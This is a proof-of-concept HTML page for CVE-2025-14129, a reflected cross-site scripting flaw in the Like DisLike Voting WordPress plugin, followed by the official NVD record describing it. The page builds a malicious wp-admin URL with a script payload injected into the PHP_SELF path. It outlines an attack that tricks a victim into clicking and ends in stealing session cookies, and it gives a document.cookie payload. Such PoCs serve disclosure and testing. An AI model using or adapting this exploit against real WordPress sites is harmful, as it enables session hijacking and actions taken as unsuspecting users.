CVE-2025-14129

<!-- CVE-2025-14129 PoC: Reflected XSS in Like DisLike Voting WordPress Plugin --> <!-- Target: Like DisLike Voting plugin <= 1.0.1 --> <!-- Attack Vector: Malicious URL via $_SERVER['PHP_SELF'] --> <!DOCTYPE html> <html> <head> <title>CVE-2025-14129 PoC</title> </head> <body> <h3>CVE-2025-14129 Reflected XSS PoC</h3> <p>Target: Like DisLike Voting plugin for WordPress <= 1.0.1</p> <!-- Malicious URL that triggers the XSS --> <p>Malicious URL:</p> <code id="malicious-url"></code> <script> // Construct the malicious URL // The XSS payload is injected into the PHP_SELF path var targetBase = window.location.origin + '/wp-admin/admin.php'; var xssPayload = '<script>alert("XSS CVE-2025-14129")</script>'; var maliciousUrl = targetBase + '/' + xssPayload; document.getElementById('malicious-url').textContent = maliciousUrl; // Example attack scenario console.log('CVE-2025-14129 Attack URL:', maliciousUrl); // When victim visits this URL, the XSS payload in PHP_SELF will be reflected // and executed in the victim's browser context </script> <!-- Simulated attack flow --> <h4>Attack Scenario:</h4> <ol> <li>Attacker crafts a malicious URL containing XSS payload in path</li> <li>Victim is tricked into clicking the malicious link</li> <li>Server reflects the unsanitized PHP_SELF in response</li> <li>Victim's browser executes the injected JavaScript</li> <li>Attacker steals session cookies or performs actions as victim</li> </ol> <!-- Direct XSS payload for reference --> <p>XSS Payload: <code>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</code></p> </body> </html>

{"cve": {"id": "CVE-2025-14129", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:47.553", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Like DisLike Voting plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/like-dislike-voting/tags/1.0.1/files/function.php#L76", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/like-dislike-voting/trunk/files/function.php#L76", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/like-dislike-voting/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/25dfa483-26c6-43d1-9a24-9ea245b54f4c?source=cve", "source": "[email protected]"}]}}